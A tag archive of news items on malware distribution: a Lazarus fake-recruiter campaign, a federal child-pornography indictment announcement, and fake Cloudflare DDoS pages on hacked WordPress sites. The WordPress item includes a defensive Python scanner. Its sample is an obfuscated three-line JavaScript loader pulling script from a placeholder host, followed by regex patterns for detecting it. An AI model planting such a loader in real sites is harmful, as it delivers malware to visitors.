Tag Archive for: distribute

North Korean hackers offer fake jobs to distribute malware


Lazarus, a state-sponsored hacker group based in North Korea, is now using open-source software and creating fake jobs in order to spread malware, says Microsoft.

The well-known group of hackers is targeting many key industry sectors, such as technology, media entertainment, and defense, and it’s using many different kinds of software to carry out these attacks.

Image: how the hacker group ZINC operates (Microsoft).

The next time a recruiter messages you on LinkedIn, be careful. Microsoft warns that the North Korea-based threat group has been sending trojanized builds of open-source software to industry professionals. Microsoft has observed these social engineering attacks since late April, continuing until at least mid-September.

Lazarus, also tracked as ZINC, Labyrinth Chollima, and Black Artemis, is a state-sponsored military hacking group from North Korea. It is believed to have been active since at least 2009 and has since been responsible for a variety of large attacks, including phishing and ransomware campaigns.

The group has been creating fake LinkedIn recruiter profiles and approaching suitable candidates with job offers at legitimate, existing companies. “Targets received outreach tailored to their profession or background and were encouraged to apply for an open position at one of several legitimate companies,” said Microsoft.

Once a target was persuaded to move the conversation from LinkedIn to WhatsApp, which offers encrypted communication and takes the exchange off LinkedIn's platform, the attackers moved to the next step: during the WhatsApp conversation, the target received trojanized software that let Lazarus deploy malware on their system.

The attackers' end goal was to steal sensitive information or gain access to valuable networks. The malware was hidden in trojanized builds of legitimate tools such as PuTTY, KiTTY, TightVNC, muPDF/Subliminal Recording, and Sumatra PDF Reader, and the social side of the attacks was just as carefully engineered, with LinkedIn profiles and target companies chosen to match the victim's profession. An installer received over a chat channel rather than from the vendor's own download page should be treated as untrusted; compare its hash against the vendor's published value before running it.

Image: a hacker breaking into a system using code (Getty Images).

As noted by Bleeping Computer, ZINC has also carried out similar attacks by using fake social media personas to distribute malware….

Source…

Five Defendants Indicted in a Conspiracy to Distribute Child Pornography | USAO-SDFL


Miami, Florida – A federal grand jury in West Palm Beach has charged five men with one count of conspiracy to distribute child pornography and multiple counts of distribution and solicitation of child pornography. 

Anthony Wayne Santiago, 28, of Novi, MI; Jacob Dominic VanDyke, 25, of Muskegon, MI; Johnathan Scott Fleak, 32, of Pryor, OK; Aaron Ray Iuliano, 27, of Ravenna, OH; and Michael Paul Gianfrancesco, 39, of Livingston, TN, were members of a chat room predicated on the distribution of pornography of children under the age of 13 years.

According to the indictment, from September to October 2021, the five defendants entered and participated in a private online chat. These defendants all distributed and/or solicited child pornography among more than 50 other individuals.

Juan Antonio Gonzalez, U.S. Attorney for the Southern District of Florida, Anthony Salisbury, Special Agent in Charge, Homeland Security Investigations (HSI), and Ric Bradshaw, Sheriff, Palm Beach County Sheriff’s Office (PBSO), made the announcement.

HSI Miami and PBSO investigated the case. Assistant U.S. Attorney Gregory Schiller is prosecuting the case.

This case was brought as part of Project Safe Childhood (PSC), a nationwide initiative launched in May 2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse. Led by United States Attorneys' Offices and the Criminal Division's Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend, and prosecute individuals who sexually exploit children, and to identify and rescue victims. For more information about the Project Safe Childhood initiative and for information regarding Internet safety, please visit www.justice.gov/psc.

An indictment contains mere allegations and defendants are innocent unless found guilty in a court of law.

Related court documents and information may be found on the website of the District Court for the Southern District of Florida at www.flsd.uscourts.gov or at http://pacer.flsd.uscourts.gov, under case number 22-cr-80127.


Source…

Hackers Using Fake DDoS Protection Pages to Distribute Malware


WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer.

“A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware,” Sucuri’s Ben Martin said in a write-up published last week.

Distributed denial-of-service (DDoS) protection pages are interstitial browser verification checks meant to keep bot-driven junk and malicious traffic from eating up bandwidth and taking a site down.

The new attack vector involves hijacking WordPress sites to display fake DDoS protection pop-ups that, when clicked, ultimately lead to the download of a malicious ISO file (“security_install.iso”) to the victim’s systems.


This is achieved by injecting three lines of code into a JavaScript file ("jquery.min.js"), or alternatively into the website's active theme file; the injected code in turn loads heavily obfuscated JavaScript from a remote server.

“This JavaScript then communicates with a second malicious domain which loads more JavaScript that initiates the download prompt for the malicious .iso file,” Martin explained.

After the download, the user is told to enter a verification code generated by a so-called "DDoS Guard" application, which lures the victim into opening the weaponized installer inside the ISO in order to reach the site.

While the installer does show a verification code to keep up the ruse, the file actually drops NetSupport RAT, a remote access trojan linked to the FakeUpdates (aka SocGholish) malware family, and also quietly installs Raccoon Stealer, a credential-stealing trojan rented out on underground forums.

The development is a sign that attackers are opportunistically co-opting these familiar security mechanisms in their own campaigns in a bid to trick unsuspecting website visitors into installing malware.


To mitigate such threats, website owners should place their sites behind a web application firewall, run file integrity checks on core, theme, and plugin files, and enforce two-factor authentication (2FA). Website visitors are also urged to turn on 2FA,…
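The file integrity check above is the control that catches the injection described earlier (a few appended lines in jquery.min.js or a theme file that build a script tag pointing at a remote host). The following is an added example, not Sucuri's, WordPress's, or the attackers' code: it hashes a file against a known-good manifest and, because injections into core JavaScript are normally appended, runs loader heuristics over the file's tail and decodes any String.fromCharCode(...) sequences so the analyst can read the hidden string. The file contents, the manifest, and the cdn.example.invalid host are constructed for the example; in production the manifest would come from the checksums WordPress publishes per release (what `wp core verify-checksums` compares against).

```python
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass, field

# --- Constructed sample inputs (stand-ins, not the real jQuery file or a real payload) ---
CLEAN_JQUERY = (
    "/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */\n"
    '!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?'
    "module.exports=t(e):t(e)}(window);\n"
)
# The same file with three appended lines that create a <script> tag whose src is
# partly hidden behind String.fromCharCode; the host is a placeholder in the .invalid TLD.
INJECTED_JQUERY = CLEAN_JQUERY + (
    "var _0x=document.createElement('script');\n"
    "_0x.src=String.fromCharCode(104,116,116,112,115,58,47,47)+'cdn.example.invalid/jquery-ui.js';\n"
    "document.getElementsByTagName('head')[0].appendChild(_0x);\n"
)

# Hypothetical known-good manifest: path -> SHA-256 of the pristine file.
KNOWN_GOOD = {
    "wp-includes/js/jquery/jquery.min.js": hashlib.sha256(CLEAN_JQUERY.encode()).hexdigest(),
}

# Heuristics for an appended remote loader. Each one alone is common in legitimate
# code; several together in the tail of a core file is what is unusual.
INDICATORS = {
    "creates_script_tag": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "charcode_obfuscation": re.compile(r"String\.fromCharCode\("),
    "sets_script_src": re.compile(r"\.src\s*="),
    "eval_or_function_ctor": re.compile(r"\b(eval|Function)\s*\("),
    "inserts_into_dom": re.compile(r"\.(appendChild|insertBefore)\("),
}

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")


@dataclass
class Finding:
    path: str
    hash_matches: bool
    indicators: list[str] = field(default_factory=list)
    decoded_strings: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A hash mismatch alone may be a legitimate edit; require loader indicators too.
        return not self.hash_matches and len(self.indicators) >= 2


def decode_fromcharcode(js: str) -> list[str]:
    """Render String.fromCharCode(104,116,...) literals as text so the hidden URL is readable."""
    decoded = []
    for match in FROMCHARCODE_RE.finditer(js):
        codes = [int(c) for c in match.group(1).replace(" ", "").split(",") if c]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def scan_file(path: str, content: str, manifest: dict[str, str], tail_lines: int = 10) -> Finding:
    """Compare the file's digest with the manifest, then run the loader heuristics over
    its last `tail_lines` lines, where appended injections end up."""
    digest = hashlib.sha256(content.encode()).hexdigest()
    finding = Finding(path=path, hash_matches=(manifest.get(path) == digest))
    tail = "\n".join(content.splitlines()[-tail_lines:])
    finding.indicators = [name for name, rx in INDICATORS.items() if rx.search(tail)]
    finding.decoded_strings = decode_fromcharcode(tail)
    return finding


if __name__ == "__main__":
    path = "wp-includes/js/jquery/jquery.min.js"
    for label, content in (("clean", CLEAN_JQUERY), ("injected", INJECTED_JQUERY)):
        f = scan_file(path, content, KNOWN_GOOD)
        print(f"{label}: hash_ok={f.hash_matches} suspicious={f.suspicious} "
              f"indicators={f.indicators} decoded={f.decoded_strings}")
```

Run `scan_file` over every `.js` and `.php` file under wp-includes, wp-admin, and the active theme directory, not just jquery.min.js, since the article notes the injection can land in the theme file instead. The two-indicator threshold keeps a single `.src=` assignment in legitimate code from firing; lower it only for files whose manifest hash you fully trust.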

Source…

WordPress sites being hacked with fake Cloudflare DDoS to distribute malware


As reported on Saturday, WordPress sites are being hacked to display fake Cloudflare DDoS protection pages that distribute malware installing the NetSupport RAT and the Raccoon Stealer password-stealing Trojan.

DDoS protection screens are commonplace on the internet; they shield sites from bots that hammer them with bogus requests in an attempt to overwhelm them with garbage traffic.

Internet users treat these welcome screens as an unavoidable short-term annoyance that keeps their favorite online resources safe from malicious actors. Unfortunately, that familiarity is exactly what makes them a good lure for malware campaigns, Bleeping Computer reports.

According to Sucuri's report, attackers are compromising poorly protected WordPress sites to add a heavily obfuscated JavaScript payload that displays a fake Cloudflare DDoS protection screen.

In June 2022, Raccoon Stealer returned to operations when its authors released its second major version and made it available to cybercriminals under a subscription model.

Raccoon 2.0 targets passwords, cookies, auto-fill data, and credit cards saved on web browsers, a wide range of cryptocurrency wallets, and it also has the potential of performing file exfiltration and taking screenshots of the victim’s desktop.

Source…